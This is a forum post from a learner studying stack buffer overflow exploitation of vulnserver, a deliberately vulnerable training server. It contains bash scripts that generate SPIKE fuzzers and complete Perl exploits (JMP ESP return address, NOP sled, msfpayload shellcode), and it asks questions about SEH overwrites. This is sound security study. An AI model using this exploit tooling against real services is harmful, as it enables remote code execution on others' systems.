redcodefinal

Thank you very much! I went looking and the same guy who wrote some tutorials I sued before made one on SEH, it's the same dude who made vulnserver.

Hi there, I'm new and wanted to introduce myself. I am redcodefinal, I am 18 and live in California. Lately I have been learning about writing your own exploits using Steve Bradshaw's vulnserver. For those who are unfamiliar, it is a Telnet server that is purposely vulnerable to exploitation. I wrote 1 exploit for it but, I was hoping that someone could point me in the right direction for a couple other exploitation methods that I am having trouble with. I will make these questions red so it's easier to find. I'll start by telling you what I learned so that way there is no miscommunication. First off, we use spike, which is a general fuzzer, to push random buffer lengths into a command. We set the command that we want to use by setting the header. Next we just make a string variable to hold our random buffer value and we are off. (PS. I also wrote a BASH script to pump out these scripts because I am lazy) #! /bin/bash echo "Creates a fuzzer script for spike" echo "Usage: ./createfuzzscipt.sh [file] [command]" if [ $# -ne 2 ] then echo "WRONG ARGS!" else touch $1 echo "s_readline();" > $1 echo "s_string(\"$2 \");" >> $1 echo "s_string_variable(\"COMMAND\");" >> $1 cat $1 echo "Happy Fuzzing" fi Pretty simple so far. So next we fuzz the target command using spike's general_send_tcp program. If it crashes it is possible that it is vulnerable to attack. We use wireshark to trace back the packets, vulnserver tells you if the command complete successfully or not. We look for TCP streams that don't have that at the end. I was doing this for the TRUN command which happens to crash around 5000 bytes. Now we need to write a Perl script to fuzz the target more intelligently. (I also wrote a BASH script to pump these out for me since, yet again, I am lazy.) #! /bin/bash echo "This script will generate a Perl scrip used for general fuzzing" echo "Be nice to it, it's still in it\'s beta stages" echo "USAGE: ./createplfuzz.sh [file]" echo " " echo "What do you want the header to be?" read header echo "How big should the junk size be?" read junksize echo "IP address? (Say \$ARGV[0] to make it ask)" read ip echo "Port? (Say \$ARGV[1] to make it ask)" read port echo "Beginning Perl Script Maker" echo '#! /usr/bin/perl' > $1 echo 'use IO::Socket;' >> $1 echo "\$header = \"$header\";" >> $1 junk=`/pentest/exploits/framework/tools/pattern_create.rb $junksize` echo "\$junk = \"$junk\";" >> $1 echo '$socket = IO::Socket::INET->new(' >> $1 echo 'Proto => "tcp",' >> $1 echo "PeerAddr => \"$ip\"," >> $1 echo "PeerPort => \"$port\"," >> $1 echo ');' >> $1 echo '$socket->recv($serverdata, 1024);' >> $1 echo 'print $serverdata;' >> $1 echo "\$socket->send(\$header.\$junk);" >> $1 echo "DONE!" cat $1 chmod +x $1 echo "Happy Fuzzing" So basically a quick look at what is going on. /pentest/exploits/framework/tools/pattern_create.rb $junksize runs a command that creates a traceable pattern so if we overwrite EIP we can use this to trace EIP back and see how many bytes it took to crash it. The header is the command. Next I open ollyDbg on vulnserver and run vulnserver. Then I use my newly created fuzzing script to crash the program, I then take the value of EIP, pop it into the tracing program, and find that it is 2003 bytes in (I am still talking about the TRUN command.) I pretty much understand everything up to this point, however I am a little fuzzy on the next part :/ Next we write our exploit. Basically we just fill in that 2003 character space with junk values (For debigging purposes I just use 'A' (\x41)) Next we grab a JMP ESP command from a dll it loads. The reason we do this is because most dlls won't be compiled with ASLR or SafeSEH. Beyond that I don't have a clue why we need this. This is one question I'd love answered. Then we pack the value into Little Endian format. I understand what Little Endian format is but, I don't understand why we need to pack the value like that. The line is $eip = pack('V', "0x625011af) Next we insert our shellcode (I wrote a script to just grab a meterpreter payload and insert it here. The script is at the end of this section) Next we make a NOP sled. I understand why we use it, however, the tutorial I used for this didn't explain how he arrived at the amount of NOPs he did (He used 20). How do you know how many NOPs to use for your sled? Lastly, we just send it over the wire. $socket->send($header.$junk.$eip.$nop.$shellcode); Here is the Perl Exploit generation script. #! /bin/bash echo "This script will generate a Perl script used for exploit dev and testing" echo "Be nice to it, it's still in it's beta stages" echo "USAGE: ./createplexploit.sh [file]" echo " " echo "What do you want the header to be?" read header echo "How big should the junk size be?" read junksize echo "What is the EIP value?" read eip echo "How many NOPs should the sled contain?" read nop echo "What payload should we use?" read payload echo "What encoder should we use?" read encoder echo "What options do we want for the payload (You should know these" read ploptions echo "IP address? (Say \$ARGV[0] to make it ask)" read ip echo "Port? (Say \$ARGV[1] to make it ask)" read port echo "Beginning Perl Script Maker" echo '#! /usr/bin/perl' > $1 echo 'use IO::Socket;' >> $1 echo "\$header = \"$header\";" >> $1 echo "\$junk = \"\\x41\" x $junksize;" >> $1 echo "\$eip = pack('V', $eip);" >> $1 echo "\$nop = \"\\x90\" x $nop;" >> $1 shellcode=`msfpayload $payload $ploptions EXITFUNC=seh R | msfencode -t perl -e $encoder | grep -e '"'` echo "\$shellcode = $shellcode" >> $1 echo '$socket = IO::Socket::INET->new(' >> $1 echo 'Proto => "tcp",' >> $1 echo "PeerAddr => \"$ip\"," >> $1 echo "PeerPort => \"$port\"," >> $1 echo ');' >> $1 echo '$socket->recv($serverdata, 1024);' >> $1 echo 'print $serverdata;' >> $1 echo '$socket->send($header.$junk.$eip.$nop.$shellcode);' >> $1 echo "DONE!" cat $1 chmod +x $1 echo "Happy Exploiting" So the exploit works fine. Next, I wanted to try to make my own, however I hit some roadblocks. The command I tried to use was GMON, KSTET, and GTER. All crashed when I used spike fuzzer. However I run into the same problem with each of them. Each one has an extremely small junk space. (GMON was untraceable, I don't think it's overwriting EIP, KSTET only had 66 bytes, GTER only has 147 bytes) I noticed there isn't enough space for the shellcode. I first noticed it when I threw in some breakpoints (\xCC) to the beginning and end of the shell code. It would hit the first one but, not the 2nd. Later I just changed the shell code in my script to \x42 x 1000, I noticed not all of the Bs showed up. I know there is a couple tricks to making shellcode execute from a different location but, the one would prefer to use is over writing the SEH chains, the SEH Chains are an error handling address that gets called when the program crashes, the SEH Chains in vulnserver point to ntdll. What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it? List of questions; How does the JMP ESP address from a non-ASLR dll help use execute shellcode? Why do we need to pack the EIP address in little endian format? How do we know how many NOPs to use in our sled? What is the proper method for over writing SEH and hiding our shellcode somewhere else?